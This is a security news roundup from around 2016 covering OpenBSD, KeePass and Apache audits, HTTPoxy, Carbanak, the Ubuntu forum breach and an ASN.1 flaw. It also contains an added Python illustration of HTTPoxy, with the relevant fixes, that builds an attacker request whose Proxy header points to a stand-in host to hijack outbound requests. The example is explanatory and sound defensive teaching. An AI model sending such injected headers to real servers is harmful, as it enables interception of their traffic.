
Security

Security Leftovers

Filed under
Security

OpenBSD 6.0 tightens security by losing Linux compatibility

Filed under
Security
BSD

OpenBSD, one of the more prominent variants of the BSD family of Unix-like operating systems, will be released at the beginning of September, according to a note on the official OpenBSD website.

Often touted as an alternative to Linux, OpenBSD is known for the lack of proprietary influence on its software and has garnered a reputation for shipping with better default security than other OSes and for being highly vigilant (some might say strident) about the safety of its users. Many software router/firewall projects are based on OpenBSD because of its security-conscious development process.

Read more

Security News

Filed under
Security

Security News

Filed under
Security
  • As a blockchain-based project teeters, questions about the technology’s security

    There’s no shortage of futurists, industry analysts, entrepreneurs and IT columnists who in the past year have churned out reports, articles and books touting blockchain-based ledgers as the next technology that will run the world.

  • Fix Bugs, Go Fast, and Update: 3 Approaches to Container Security

    Containers are becoming the central piece of the future of IT. Linux has had containers for ages, but they are still maturing as a technology to be used in production or mission-critical enterprise scenarios. With that, security is becoming a central theme around containers. There are many proposed solutions to the problem, including identifying exactly what technology is in place, fixing known bugs, restricting change, and generally implementing sound security policies. This article looks at these issues and how organizations can adapt their approach to security to keep pace with the rapid evolution of containers.

  • Preventing the next Heartbleed and making FOSS more secure [Ed: Preventing the next Microsoft-connected trademarked bug for FOSS and making FOSS more secure from Microsoft FUD]

    David Wheeler is a long-time leader in advising and working with the U.S. government on issues related to open source software. His personal webpage is a frequently cited source on open standards, open source software, and computer security. David is leading a new project, the CII Best Practices Badging project, which is part of the Linux Foundation's Core Infrastructure Initiative (CII) for strengthening the security of open source software. In this interview he talks about what it means for both government and other users.

Keeweb A Linux Password Manager

Filed under
Linux
Reviews
Security

Today we depend on more and more online services. Each online service we sign up for requires us to set a password, so we end up having to remember hundreds of them, and it is easy to forget some. In this article I am going to talk about Keeweb, a Linux password manager that can store all your passwords securely either online or offline.

Read more

Security News

Filed under
Security
  • Security updates for Thursday
  • Open Source Information Security Tool Aimed at MSSPs

    A Virginia software developer announced today the release of what’s billed as the first open source information security analytics tool for managed security services providers (MSSP) and enterprise.

    IKANOW says its new platform features multi-tenancy, enterprise scalability and is fully customizable.

  • Most companies still can't spot incoming cyberattacks

    Four out of five businesses lack the required infrastructure or security professionals with relevant skills to spot and defend against incoming cyberattacks.

    According to a new report by US cybersecurity and privacy think tank Ponemon Institute on behalf of cybersecurity firm BrandProtect, 79 percent of cybersecurity professionals say that their organisations are struggling to monitor the internet for the external threats posed by hackers and cybercriminals.

  • HTTPoxy Flaw Re-emerges After 15 Years and Gets Fixed

    After lying dormant for years, flaws in how the HTTP "Proxy" header is handled by programming languages and applications, such as PHP, Go and Python, have now been fixed.
    Some flaws take longer, a lot longer, than others to get fixed. The newly named HTTPoxy vulnerability was first discovered back in March 2001 and fixed in Perl's libwww-perl HTTP client library, but it sat dormant in multiple other languages and applications until July 18.

    HTTPoxy is at its core a name-space collision between two unrelated uses of the name HTTP_PROXY. The Common Gateway Interface (CGI) specification turns every incoming request header into an environment variable named HTTP_<HEADER>, so a client-supplied "Proxy" header becomes HTTP_PROXY in the environment of the script. At the same time, many HTTP client libraries read HTTP_PROXY as the outbound proxy to use. An attacker who sends a Proxy header to a vulnerable CGI application can therefore redirect that application's outgoing HTTP requests through a server they control, intercepting or disrupting them.

  • Hack The World

    Currently HackerOne has 550+ customers, has paid over $8.9 million in bounties, and fixed over 25,000 vulnerabilities, which makes for a safer Internet.

  • EU aims to increase the security of password manager and web server software: KeePass and Apache chosen for open source audits [“pyrrhic because of Keepass : flushing the audit money down the toilet on MS based cruft” -iophk]

    For the FOSSA pilot project to improve the security of open source software that my colleague Max and I proposed, the European Commission sought your input on which tools to audit.

    The results are now in: The two overwhelming public favorites were KeePass (23%) and the Apache HTTP Server (19%). The EU has decided to follow these recommendations and audit both of these software projects for potential security issues.

  • KeeThief – A Case Study in Attacking KeePass Part 2

    The other week I published the “A Case Study in Attacking KeePass” post detailing a few notes on how to operationally “attack” KeePass installations. This generated an unexpected amount of responses, most good, but a few negative and dismissive. Some comments centered around the mentality of “if an attacker has code execution on your system you’re screwed already so who cares”. Our counterpoint to this is that protecting your computer from malicious compromise is a very different problem when it’s joined to a domain versus isolated for home use. As professional pentesters/red teamers we’re highly interested in post-exploitation techniques applicable to enterprise environments, which is why we started looking into ways to “attack” KeePass installations in the first place. Our targets are not isolated home users.

  • Giuliani calls for cybersecurity push

    Former New York mayor Rudy Giuliani made a surprise appearance at the BlackBerry Security Summit, warning of the rapid growth of cybercrime and cyberterrorism.

    Cybercrime and cyberterrorism are both growing at rates between 20% and 40%, said Giuliani, who made a brief return from the Republican National Convention in Cleveland to speak at BlackBerry's New York event.

    "Think of it like cancer. We can't cure it... but if we catch it early we can put it into remission," he said. The quicker you can spot an attack, the less chance there is of loss.

  • Notorious Hacker ‘Phineas Fisher’ Says He Hacked The Turkish Government

    A notorious hacker has claimed responsibility for hacking Turkey’s ruling party, the AKP, and stealing more than 300,000 internal emails and other files.

    The hacker, who’s known as Phineas Fisher and has gained international attention for his previous attacks on the surveillance tech companies FinFisher and Hacking Team, took credit for breaching the servers of Turkey’s ruling party, the Justice and Development Party or AKP.

    “I hacked AKP,” Phineas Fisher, who also goes by the nickname Hack Back, said in a message he spread through his Twitter account on Wednesday evening.
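
The HTTPoxy collision described in the item above, as an added example that is not from the article or from any of the affected projects: a minimal model of the CGI header-to-environment mapping, a client library that reads HTTP_PROXY the way the vulnerable ones did, and the two fixes that were deployed (the library ignores HTTP_PROXY when it can tell it is running under CGI; the web server strips the Proxy header before CGI sees it). The hostnames, header values and the request itself are constructed for illustration.

```python
# Added example (not the article's or any project's code): the HTTPoxy
# name-space collision between CGI's HTTP_* variables and the HTTP_PROXY
# setting honoured by many HTTP client libraries.


def cgi_environ(request_headers, method="GET"):
    """Build CGI meta-variables the way RFC 3875 section 4.1.18 prescribes:
    header names are upper-cased, '-' becomes '_', and 'HTTP_' is prefixed.
    Only the parts relevant to the collision are modelled here."""
    env = {"REQUEST_METHOD": method}
    for name, value in request_headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def outbound_proxy_naive(env, scheme="http"):
    """What a typical getenv-based client library did before the fix:
    honour <scheme>_proxy in either case, whatever process it runs in."""
    for key in (scheme.lower() + "_proxy", scheme.upper() + "_PROXY"):
        if env.get(key):
            return env[key]
    return None


def outbound_proxy_fixed(env, scheme="http"):
    """Library-side fix: under CGI (REQUEST_METHOD is set) the upper-case
    HTTP_PROXY can only have come from a client header, so ignore it there.
    The lower-case form cannot be injected because CGI upper-cases names,
    and HTTPS_PROXY cannot be reached at all (a 'Https-Proxy' header
    becomes HTTP_HTTPS_PROXY), so only the http scheme needs the check."""
    if scheme.lower() == "http" and "REQUEST_METHOD" in env:
        return env.get("http_proxy") or None
    return outbound_proxy_naive(env, scheme)


def strip_proxy_header(request_headers):
    """Server-side fix: drop the 'Proxy' header before CGI sees it. It has
    no legitimate meaning in a request, so nothing breaks."""
    return {k: v for k, v in request_headers.items() if k.lower() != "proxy"}


# Constructed request: the attacker adds a Proxy header to an ordinary GET.
ATTACKER_HEADERS = {
    "Host": "app.example",
    "User-Agent": "curl/7.47.0",
    "Proxy": "http://attacker.example:8080",
}


def demo():
    """Return the proxy each configuration would use for the backend call."""
    env = cgi_environ(ATTACKER_HEADERS)
    stripped_env = cgi_environ(strip_proxy_header(ATTACKER_HEADERS))
    return {
        "vulnerable": outbound_proxy_naive(env),
        "library_fix": outbound_proxy_fixed(env),
        "server_fix": outbound_proxy_naive(stripped_env),
    }


if __name__ == "__main__":
    for name, proxy in demo().items():
        print(f"{name:12s} -> {proxy}")
```

Only the upper-case HTTP_PROXY collides: because CGI upper-cases header names a client cannot set http_proxy, which is why libraries that read only the lower-case form (curl, for one) were never affected. On a real server the equivalent of strip_proxy_header is a rule such as Apache's `RequestHeader unset Proxy early`, applied in addition to, not instead of, the library fix.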

Security News

Filed under
Security

EC to audit Apache HTTP Server and Keepass

Filed under
Security

The European Commission is preparing a software source code security audit on two software solutions, Apache HTTP server and Keepass, a password manager. The source code will be analysed and tested for potential security problems, and the results will be shared with the software developers. The audits will start in the coming weeks.

Read more

Security News

Filed under
Security
  • Security advisories for Tuesday
  • BlackBerry Inks Software Deal With U.S. Senate
  • BlackBerry inks security software deals, shares slip
  • BlackBerry Announces String of Small Security Software Deals
  • BlackBerry inks U.S. government software deals; shares slip
  • Carbanak Gang Tied to Russian Security Firm?

    Among the more plunderous cybercrime gangs is a group known as “Carbanak,” Eastern European hackers blamed for stealing more than a billion dollars from banks. Today we’ll examine some compelling clues that point to a connection between the Carbanak gang’s staging grounds and a Russian security firm that claims to work with some of the world’s largest brands in cybersecurity.

    The Carbanak gang derives its name from the banking malware used in countless high-dollar cyberheists. The gang is perhaps best known for hacking directly into bank networks using poisoned Microsoft Office files, and then using that access to force bank ATMs into dispensing cash. Russian security firm Kaspersky Lab estimates that the Carbanak Gang has likely stolen upwards of USD $1 billion — but mostly from Russian banks.

  • Now you can ask Twitter directly to verify your account

    Do you have an army of imposters online pretending to be you? Probably not, but you can now still request a verified Twitter account.

    On Tuesday, Twitter launched an official application process so that any account can be verified and receive a blue checkmark badge next to its username. Twitter users interested in applying should have a verified phone number and email address, as well as a profile photo that reflects the person or company branding.

    Verified accounts get to filter their mentions to only see those from other verified accounts. But that seems to be the only real feature or perk that comes from having a blue badge–aside from bragging rights, of course. Additionally, verified accounts can’t be private, and the username must remain the same or you will have to seek verification all over again. If you are rejected, you can reapply after 30 days. Previously, the verification process was never clear-cut, and it seemed to require a direct connection to a Twitter rep.

  • Software flaw puts mobile phones and networks at risk of complete takeover [Ed: proprietary software]

    A newly disclosed vulnerability could allow attackers to seize control of mobile phones and key parts of the world's telecommunications infrastructure and make it possible to eavesdrop or disrupt entire networks, security experts warned Tuesday.

    The bug resides in a code library used in a wide range of telecommunication products, including radios in cell towers, routers, and switches, as well as the baseband chips in individual phones. Although exploiting the heap overflow vulnerability would require great skill and resources, attackers who managed to succeed would have the ability to execute malicious code on virtually all of those devices. The code library was developed by Pennsylvania-based Objective Systems and is used to implement a telephony standard known as ASN.1, short for Abstract Syntax Notation One.

Security News

Filed under
Security
  • Ubuntu forum breach traced to neglected plugin
  • Canonical warns users after Ubuntu forum data breach
  • Flaw in vBulletin add-on leads to Ubuntu Forums database breach
  • CrypTech — Internet Engineers’ New Open Source Weapon Against ‘Creepy’ Governments

    The CrypTech project is an independent security hardware development effort that consists of an international team. CrypTech Alpha is an open source crypto-vault that stores private/public keys and keeps the private key material separate from the software using it. It has been developed as a hardware security module (HSM) to make the implementation of strong cryptography easier.

  • Entrepreneur in £10m swoop for hacking team

    One of the northwest’s best-known entrepreneurs has splashed out about £10m on a cyber-security venture that helps businesses repel hackers.

    Lawrence Jones, who runs the Manchester-based internet hosting and cloud computing specialist UKFast, has bought Pentest, an “ethical hacking” firm whose staff help detect flaws in clients’ cyber-defences.

    Jones, 47, will merge Pentest’s 45 staff into his own cyber-security outfit, Secarma. “It’s become obvious that there is a massive need to put emphasis on cyber-security,” said the internet tycoon, whose wealth is calculated by The Sunday Times Rich List as £275m.

  • Guilt by ASN: Compiler's bad memory bug could sting mobes, cell towers

    A vulnerability in a widely used ASN.1 compiler isn't a good thing: it means a bunch of downstream systems – including mobile phones and cell towers – will inherit the bug.

    And an ASN.1 bug is what the Sadosky Foundation in Argentina has turned up, in Objective Systems' software.

    The research group's Lucas Molas says Objective's ASN1C compiler for C/C++ version 7.0.0 (other builds are probably affected) generates code that suffers from heap memory corruption. This could be potentially exploited to run malware on machines and devices that run the vulnerable compiler output or interfere with their operation.
